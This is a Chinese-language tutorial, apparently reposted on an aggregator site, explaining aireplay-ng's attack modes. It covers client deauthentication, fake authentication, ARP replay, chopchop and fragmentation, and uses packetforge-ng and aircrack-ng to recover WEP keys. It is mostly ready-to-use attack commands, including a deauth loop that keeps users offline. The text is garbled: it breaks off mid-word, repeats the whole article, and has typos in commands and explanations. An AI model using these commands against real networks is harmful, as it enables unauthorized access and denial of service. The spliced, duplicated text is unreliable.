admin管理员组文章数量:1532013
2024年7月17日发(作者:)
aireplay-ng的模式详解
aireplay-ng的6种攻击模式详解
-0 deautenticate冲突模式
使已经连接的合法客户端端强制断开与路由器的连接,使其重新
连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。
如果一个客户端连在路由器上,但是没有人上网来产生有效数据,
此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式
来配合-3攻击来会被激活
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0
参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无
法正常上网)
-a设置ap的mac地址,-c设置已连接的合法客户端的mac地
址(如果要-c则所有与ap连接的客户端全部断线)
-1 fakeauth count 伪装一个客户端和ap进行连接
这是没有客户端研究学习的第一步,因为是没有合法连接的客户
端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,
必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注
入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap
的mac地址-h设置伪装客户端的网卡mac地址(就是自己网卡的
mac地址)
-2 interactive 交互模式
这个模式集合了抓包和提取数据,发包注入三种功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac
wifi0
参数说明:-p设置控制帧中包含的信息(16进制),默认采用
0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的
客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包
aireplay-ng -2 -r myarp -x 1024 wifi0
参数说明:myarp:自己设置的文件名;-x 1024:发包的速度
(最大为1024)
-3 arp-request注入攻击模式
这种模式是一种抓包后分析重发的过程
aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0
-4 chopchop攻击模式,用来获得一个包含密aireplay-ng的6
中攻击模式详解
-0 deautenticate冲突模式
使已经连接的合法客户端端强制断开与路由器的连接,使其重新
连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。
如果一个客户端连在路由器上,但是没有人上网来产生有效数据,
此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式
来配合-3攻击来会被激活
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0
参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无
法正常上网)
-a设置ap的mac地址,-c设置已连接的合法客户端的mac地
址(如果要-c则所有与ap连接的客户端全部断线)
-1 fakeauth count 伪装一个客户端和ap进行连接
这是没有客户端研究学习的第一步,因为是没有合法连接的客户
端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,
必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注
入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap
的mac地址-h设置伪装客户端的网卡mac地址(就是自己网卡的
mac地址)
-2 interactive 交互模式
这个模式集合了抓包和提取数据,发包注入三种功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac
wifi0
参数说明:-p设置控制帧中包含的信息(16进制),默认采用
0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的
客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包
aireplay-ng -2 -r myarp -x 1024 wifi0
参数说明:myarp:自己设置的文件名;-x 1024:发包的速度
(最大为1024)
-3 arp-request注入攻击模式
这种模式是一种抓包后分析重发的过程
aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0
-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0
-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀
为xor的文件)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k
255.255.255.255 -l
255.255.255.255 -y niam_xor -w mrarp
参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;
-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:
xor文件的名字;-w设置伪装的arp包的文件名
aircrack-ng -n 64 -b ap_mac
参数说明:-n设置key长度(64/128/256/512)
钥数据的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0
-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀
为xor的文件)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k
255.255.255.255 -l
255.255.255.255 -y niam_xor -w mrarp
参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;
-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:
xor文件的名字;-w设置伪装的arp包的文件名
aircrack-ng -n 64 -b ap_mac
参数说明:-n设置key长度(64/128/256/512)
版权声明:本文标题:aireplay-ng的模式详解 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1721164217a863573.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论